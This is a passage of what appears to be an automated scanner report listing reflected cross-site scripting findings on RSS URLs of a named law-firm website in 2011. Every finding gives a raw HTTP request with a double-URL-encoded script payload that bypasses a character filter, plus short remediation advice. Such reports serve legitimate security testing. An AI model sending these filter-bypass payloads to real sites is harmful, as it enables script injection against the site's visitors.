This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9/practices/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising/rss.xml86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0 was submitted in the REST URL parameter 1. This input was echoed as 164d9"><script>alert(1)</script>7c58cabc2d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0/practices/Antitrust/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b was submitted in the REST URL parameter 2. This input was echoed as 9acfd"><script>alert(1)</script>287c030088b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b/Antitrust/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af was submitted in the REST URL parameter 3. This input was echoed as bd079"><script>alert(1)</script>bf831efe7af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Antitrustbd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb was submitted in the REST URL parameter 4. This input was echoed as 10885"><script>alert(1)</script>9f493b0ddcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Antitrust/rss.xml10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601 was submitted in the REST URL parameter 1. This input was echoed as 4b382"><script>alert(1)</script>d866589a601 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601/practices/Appellate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40 was submitted in the REST URL parameter 2. This input was echoed as 83f09"><script>alert(1)</script>9da8d699e40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40/Appellate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a was submitted in the REST URL parameter 3. This input was echoed as 3566d"><script>alert(1)</script>021d1023e4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Appellate3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c was submitted in the REST URL parameter 4. This input was echoed as 2c988"><script>alert(1)</script>407b643948c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Appellate/rss.xml2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0 was submitted in the REST URL parameter 1. This input was echoed as 2da3e"><script>alert(1)</script>93729e4d7b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0/practices/Aviation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5 was submitted in the REST URL parameter 2. This input was echoed as ed7d3"><script>alert(1)</script>dd1cc3a52a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5/Aviation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296 was submitted in the REST URL parameter 3. This input was echoed as d5cb1"><script>alert(1)</script>7ae874bc296 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Aviationd5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 was submitted in the REST URL parameter 4. This input was echoed as 2f5ee"><script>alert(1)</script>49810451264 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Aviation/rss.xml2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e was submitted in the REST URL parameter 1. This input was echoed as e654b"><script>alert(1)</script>d4d67e0d85e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rsse654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e/practices/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294 was submitted in the REST URL parameter 2. This input was echoed as 53a9f"><script>alert(1)</script>e2b7ff89294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229 was submitted in the REST URL parameter 3. This input was echoed as 705db"><script>alert(1)</script>4b5b4bac229 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Bankruptcy__Financial_Restructuring705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
